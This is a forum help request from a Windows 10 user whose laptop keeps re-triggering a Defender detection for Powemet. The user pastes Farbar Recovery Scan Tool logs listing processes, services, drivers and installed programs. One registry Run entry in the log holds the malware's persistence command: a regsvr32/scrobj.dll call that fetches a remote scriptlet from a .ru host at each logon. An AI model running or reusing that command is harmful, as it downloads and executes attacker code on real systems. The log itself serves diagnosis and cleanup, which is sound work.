
Infected with Behavior:Win32/Powemet.B!attk


  • This topic is locked
2 replies to this topic

#1 abolajivictor

  • Members
  • 4 posts

Posted 21 October 2017 - 09:31 PM

Hi. My laptop is running Windows 10. After I inserted a USB thumb drive, Windows Defender detected Behavior:Win32/Powemet.B!attk. Windows Defender quarantines the infected files and I then delete them; however, every time I start the computer, the same virus is detected again by Windows Defender.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-10-2017
Ran by VEEVIC (administrator) on VICTOR (22-10-2017 03:10:18)
Running from G:\
Loaded Profiles: VEEVIC (Available Profiles: VEEVIC)
Platform: Windows 10 Home 10240.16384 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\omtsreco.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR.EXE
() C:\app\Veevic\product\12.1.0\dbhome_1\BIN\oravssw.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\oracle.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Piriform Ltd) C:\Program Files\Speccy\Speccy64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7510896 2014-01-14] (Realtek Semiconductor)
HKLM\...\Run: [IgfxTray] => "C:\Windows\system32\igfxtray.exe"
HKLM\...\Run: [HotKeysCmds] => "C:\Windows\system32\hkcmd.exe"
HKLM\...\Run: [Persistence] => "C:\Windows\system32\igfxpers.exe"
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2803440 2013-12-13] (Synaptics Incorporated)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [1045304 2013-10-08] (Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [Speccy] => C:\Program Files\Speccy\Speccy64.exe [7128280 2016-11-18] (Piriform Ltd)
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{65c1b12d-5d53-4b49-8cfb-e5be7b92b6e8}: [DhcpNameServer] 192.168.43.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.uk.msn.com/HPALL14/191
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPALL14/191
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.uk.msn.com/HPALL14/191
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPALL14/191
SearchScopes: HKLM -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-133669981-2456230652-2001851347-1001 -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)

FireFox:
========
FF DefaultProfile: 1itnxb01.default
FF ProfilePath: C:\Users\VEEVIC\AppData\Roaming\Mozilla\Firefox\Profiles\1itnxb01.default [2017-10-22]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-10-12] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default [2017-10-22]
CHR Extension: (Google Docs) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-09]
CHR Extension: (Google Drive) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-10-09]
CHR Extension: (YouTube) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-10-09]
CHR Extension: (Google Search) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2017-08-15]
CHR Extension: (Google Docs Offline) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-09-08]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2017-09-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-08]
CHR Extension: (Gmail) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-10-09]
CHR crx: C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\default_apps\search.crx [2015-09-24]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [1039160 2013-10-08] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
S4 OracleJobSchedulerORCL; c:\app\veevic\product\12.1.0\dbhome_1\Bin\extjob.exe [45056 2014-09-11] () [File not signed]
R2 OracleOraDB12Home1MTSRecoveryService; C:\app\Veevic\product\12.1.0\dbhome_1\bin\omtsreco.exe [69120 2014-08-08] (Oracle Corporation) [File not signed]
R2 OracleServiceORCL; c:\app\veevic\product\12.1.0\dbhome_1\bin\ORACLE.EXE [211055104 2014-09-11] (Oracle Corporation) [File not signed]
R2 OracleVssWriterORCL; c:\app\veevic\product\12.1.0\dbhome_1\bin\OraVSSW.exe [208896 2014-09-11] () [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [713552 2015-06-25] () <==== ATTENTION
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
R2 OracleOraDB12Home1TNSListener; C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR [X]
S3 OracleRemExecServiceV2; C:\Users\VEEVIC\AppData\Local\Temp\\oraremservicev2\RemoteExecService.exe [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 cpuz140; C:\Users\VEEVIC\AppData\Local\Temp\cpuz140\cpuz140_x64.sys [43840 2017-10-22] (CPUID) <==== ATTENTION
S3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
S3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [291544 2014-01-04] (Realtek Semiconductor Corp.)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [3453144 2015-07-10] (Realtek Semiconductor Corporation )
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [29936 2013-12-13] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [31472 2013-12-13] (Synaptics Incorporated)
S3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Development Company, L.P.)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-10-22 03:02 - 2017-10-22 03:02 - 000016148 _____ C:\WINDOWS\system32\VICTOR_VEEVIC_HistoryPrediction.bin
2017-10-22 02:46 - 2017-10-22 03:10 - 000000000 ____D C:\FRST
2017-10-16 00:34 - 2017-10-16 00:34 - 000001127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2017-10-16 00:33 - 2017-10-21 18:33 - 000003246 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForVEEVIC
2017-10-16 00:33 - 2017-10-21 18:33 - 000000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForVEEVIC.job
2017-10-12 17:33 - 2017-10-12 17:33 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\WildTangent
2017-10-05 22:56 - 2017-10-05 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\USB Disk Storage Format Tool 5.3
2017-09-27 23:23 - 2017-10-22 02:59 - 000000000 ____D C:\Users\VEEVIC\AppData\LocalLow\Temp
2017-09-24 14:38 - 2017-09-24 14:47 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\SQL Developer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-10-22 03:08 - 2017-08-15 11:17 - 000000000 ____D C:\Users\VEEVIC\Documents\Youcam
2017-10-22 03:08 - 2015-07-10 12:04 - 000000000 ___HD C:\Program Files\WindowsApps
2017-10-22 03:08 - 2015-07-10 12:04 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-10-22 03:04 - 2017-08-15 12:02 - 000000472 _____ C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job
2017-10-22 03:02 - 2015-07-10 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-10-22 03:01 - 2015-07-10 10:05 - 000262144 ___SH C:\WINDOWS\system32\config\BBI
2017-10-22 02:54 - 2017-08-15 12:01 - 000004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F2867AE8-EE6D-456B-869E-65CC1A5A13FD}
2017-10-21 21:20 - 2017-08-15 12:03 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\vlc
2017-10-21 16:16 - 2017-08-15 12:07 - 000000000 ____D C:\Users\VEEVIC\Desktop\NEW FOLDER
2017-10-21 15:42 - 2017-09-04 00:03 - 000976198 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-10-21 15:42 - 2015-07-10 12:02 - 000000000 ____D C:\WINDOWS\INF
2017-10-18 21:15 - 2017-09-04 00:32 - 000000000 ___RD C:\Users\VEEVIC\OneDrive
2017-10-16 00:34 - 2017-08-15 11:58 - 000003952 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1502794694
2017-10-16 00:34 - 2017-08-15 11:58 - 000000000 ____D C:\Program Files (x86)\Opera
2017-10-15 06:27 - 2017-08-15 12:02 - 000003560 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}
2017-10-05 22:31 - 2015-07-10 12:04 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-10-05 00:06 - 2017-08-27 14:29 - 000000000 ____D C:\Users\VEEVIC\AppData\Local\ElevatedDiagnostics
2017-09-30 10:10 - 2015-07-10 11:55 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-09-30 10:09 - 2017-09-05 17:58 - 000000000 ____D C:\Program Files\rempl
2017-09-30 09:23 - 2015-07-10 14:12 - 000000000 ____D C:\WINDOWS\OCR
2017-09-24 15:40 - 2017-08-15 12:01 - 000000000 __SHD C:\Users\VEEVIC\AppData\Local\EmieUserList
2017-09-24 15:40 - 2017-08-15 12:01 - 000000000 __SHD C:\Users\VEEVIC\AppData\Local\EmieSiteList

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-10-16 00:20

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-10-2017
Ran by VEEVIC (22-10-2017 03:12:17)
Running from G:\
Windows 10 Home 10240.16384 (X64) (2017-09-03 23:27:05)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-133669981-2456230652-2001851347-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-133669981-2456230652-2001851347-503 - Limited - Disabled)
Guest (S-1-5-21-133669981-2456230652-2001851347-501 - Limited - Disabled)
VEEVIC (S-1-5-21-133669981-2456230652-2001851347-1001 - Administrator - Enabled) => C:\Users\VEEVIC
Veevic 2 (S-1-5-21-133669981-2456230652-2001851347-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

4 Elements II (HKLM-x32\...\WTA-6a199fa1-38f1-44b3-a101-934f39e3f93c) (Version: 2.2.0.98 - WildTangent) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
Airport Mania (HKLM-x32\...\WTA-f11a0709-a1c3-40ee-8032-f61d3268c3dc) (Version: 2.2.0.95 - WildTangent) Hidden
Azkend 2: The World Beneath (HKLM-x32\...\WTA-efd1fcbc-5ab8-460f-84d6-236841cef9a9) (Version: 2.2.0.98 - WildTangent) Hidden
Bejeweled 3 (HKLM-x32\...\WTA-2f234d5b-d479-48fa-98de-277ce43b117e) (Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Bounce Symphony (HKLM-x32\...\WTA-a640bb4c-a935-44f0-bcf5-f632e3880877) (Version: 2.2.0.97 - WildTangent) Hidden
Build-a-lot (HKLM-x32\...\WTA-d1f09a10-b598-4241-85af-a55e773df399) (Version: 2.2.0.98 - WildTangent) Hidden
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Cradle Of Egypt Collector's Edition (HKLM-x32\...\WTA-49d4c6b7-8cde-4cb6-a371-3b42db330957) (Version: 2.2.0.110 - WildTangent) Hidden
Cradle of Rome 2 (HKLM-x32\...\WTA-9d2834b3-8e45-414a-a4b4-3f22755e8953) (Version: 2.2.0.98 - WildTangent) Hidden
Curse at Twilight (HKLM-x32\...\WTA-6c2273fa-fc27-493a-a971-65d758f05d49) (Version: 3.0.2.32 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6902 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.5.3303 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3416 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Delicious: Emily's Childhood Memories Premium Edition (HKLM-x32\...\WTA-37e68c7b-be4d-4447-b2bf-c9b96990e3a3) (Version: 3.0.2.32 - WildTangent) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Farm Frenzy (HKLM-x32\...\WTA-c0345513-4d55-4beb-8f79-b514f21925d1) (Version: 2.2.0.98 - WildTangent) Hidden
Fishdom 3: Collector's Edition (HKLM-x32\...\WTA-1e94da68-c4ab-419c-98ae-0155eb46eaee) (Version: 3.0.2.38 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (HKLM-x32\...\WTA-7b403209-d16e-4175-b662-b52d90f47008) (Version: 2.2.0.110 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
House of 1000 Doors: Family Secrets (HKLM-x32\...\WTA-1e95c3d9-df03-4c02-8c0f-8b6fb144c86f) (Version: 2.2.0.98 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{F29E3AA8-CF19-4452-92B7-F1FE31CD11C5}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{8C696B4B-6AB1-44BC-9416-96EAC474CABE}) (Version: 7.5.2.12 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}) (Version: 1.0.10 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.11 - Softex Inc.) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3368 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Jewel Match 3 (HKLM-x32\...\WTA-2fe7d742-fdd7-4c3a-b607-ec6293578a76) (Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (HKLM-x32\...\WTA-6ae21466-8c8e-4449-9639-b3ac0827411e) (Version: 2.2.0.95 - WildTangent) Hidden
KB4023057 (HKLM\...\{ED06689A-33B7-4D35-8F76-36A82CD03406}) (Version: 2.3.0.0 - Microsoft Corporation)
King Oddball (HKLM-x32\...\WTA-c7a4f2ec-c319-4945-9d26-4232b362e01b) (Version: 3.0.2.48 - WildTangent) Hidden
Luxor Evolved (HKLM-x32\...\WTA-ad0f0cf6-b1d4-4c11-9ee4-2fef9880b6a0) (Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe (HKLM-x32\...\WTA-7b04a5a6-c8d9-4b2b-83da-69b3a5557886) (Version: 2.2.0.95 - WildTangent) Hidden
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
